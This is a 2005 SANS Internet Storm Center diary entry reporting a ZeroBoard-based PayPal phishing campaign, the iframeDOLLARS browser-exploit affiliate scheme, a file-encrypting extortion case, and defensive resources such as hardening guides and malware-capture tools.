Threat Level: green Handler on Duty: Pasquale Stirparo

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-05-23 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

eBay/Paypal Phishing; Shame on that prophet; iframeDOLLARS; Cyber Extortion; OSX hardening; Incident Responder Analysis Tools

Published: 2005-05-23
Last Updated: 2005-05-24 02:15:41 UTC
by William Salusky (Version: 1)
0 comment(s)

eBay/Paypal phishing via vulnerable ZeroBoard software



While the Internet Storm Center has certainly been receiving an increasing number of eBay and Paypal phishing reports, there is now supporting evidence that identifies a particular attack vector responsible for enabling at least a subset of the growing distribution of this particular phishing email variant. Both the delivery of phishing email and the website that is setup for the harvesting of user credentials is being accomplished through a php inclusion attack on web servers running vulnerable versions of the ZeroBoard bulletin board software. A <A HREF="http://www.securityfocus.com/archive/1/387076">vulnerability disclosure</A> for versions 4.1pl5 and prior of ZeroBoard software was posted to bugtraq on Jan 13 2005. The author has apparently not provided an official patch, but public workarounds are included in the bugtraq disclosure. A personal recommendation is to please check all of your Internet accessible hosts for the existence of the ZeroBoard, being on the receiving end of this phish is annoying but it's that much worse knowing that people are actively falling for this scam. Responsible hosting providers and web administrators, there are even multiple Nessus plugins, ID#s 16059, 16178 and 17199 for those that would like to automate thier checks.

Shame on that prophet



As silly I believe this next report is, it may very well lead to financial loss via the baited harvesting of paypal user credentials. The Storm Center received a report from D. Craig Rich of a website at www dot prophetyaweh dot com recommending that new paying subscribers to his site use the same user id and password that they use on paypal. <SARCASM>Oh Really? I'm into UFO's and such, so here's my $7.95(USD), and while you're at it, just help yourself to the rest of my account balance.</SARCASM> Notice we did not link to the site from this diary entry, so please do yourself a favor and don't bother visiting this site. Recommendation: Never reuse passwords between sites. You never know who has access to your data.

iframeDOLLARS dot biz partnership maliciousness



After fellow Storm Center handler Tom Liston's investigation into a report received from a SANS ISC reader named Checker today, we find ourselves examining what appears to be an awful business practice based on the wholesale attempted exploit of Internet Explorer browsers via multiple vulnerabilities for any IE client that happens to visit a 'partner' in this business venture. The exploits are hosted via hundreds of unique URL's on the website at www dot iframedollars dot biz including the <A HREF="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-014.asp"> (MS03-014) MHTML (.chm) exploit</A>, <A HREF="http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx">(MS03-011) Java ByteVerify exploit</A>, <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">(MS05-002) MS ANI exploit</A>, and an <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx">Mhtredir trojan exploiting MS04-013</A>. The successful exploit of any browser would result in the installation of at least nine additional samples of malicious code including backdoors, trojans, and spy/adware. So how much is your compromised workstation worth to website administrators that participate in this revenue generation scheme? A whopping $0.61(USD).
LATE DIARY ADDITION: Michael Ligh wrote in notifying us of his involvement in investigating a compromise that involved an iframedollars partner. His excellent writeup is hosted on <A HREF="http://www.mnin.org/write/2005_trimode.html">Michael's personal website</A>.
The question is: How much satifaction can one organization achieve by null-routing all traffic to this host at 81.222.131.59?

Answer: You tell us.

Cyber Extortion by client browser exploit



If the iframeDOLLARS business isn't enough, the Storm Center received an <A HREF="http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194">alert</A> from Dan Hubbard at WebSense Security Labs of a Cyber Extorsion plot involving the encoding of workstation user data after the Internet user presumably had fallen prey to a <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-023.mspx">Microsoft Internet Explorer HTTP Help browser vulnerability (MS04-023)</A>. After workstation data is encoded, the user is presented with an extortion offer enabling the user to receive a tool that would decode captive data after delivering a payment of $200.00(USD) to the extorter via an online payment service. Windows users, don't you think that is a good enough reason to check whether you are patched for this and other recent vulnerabilities. Why not kick off a Windows Update after reading the rest of this diary entry?

Additional OSX hardening guide



Supporting the May 22nd diary which included a link to the NSA OSX hardening guide, John Banghart with the Center for Internet Security wrote in to identify the availability of the CIS OSX hardening guide available for download from <A HREF="http://www.cisecurity.org">http://www.cisecurity.org</A>.

Incident Responder Malware Capture, Control and Analysis tools



Hey you! Incident Responder! Yeah, You! A few tools in the toolbox that haven't been mentioned here recently which I've been having a great amount of success and fun with in capturing malware using <A HREF="http://www.mwcollect.org">mwcollect</A>. Mwcollect has been developed within the German Honeynet project and is the tool referred to from within the Honeynet project recent Bots paper. Once I've collected samples, and I determine that something is interesting enough to examine, quick analysis gains are to be had without heavy reverse engineering by performing runtime analysis, which I do in my own Malware Motel (Malicious code gets in, but it can't get out) which are just a few slight modifications to the Honeynet project's <A HREF="http://www.honeynet.org/tools/cdrom">Honeywall</A> which enables data and network controls and provides you with as limited of a live network environment as you want for analyzing malicious code. The Honeynet project released the updated next generation of the Honeywall on May 17th 2005.
Keywords:
0 comment(s)
Diary Archives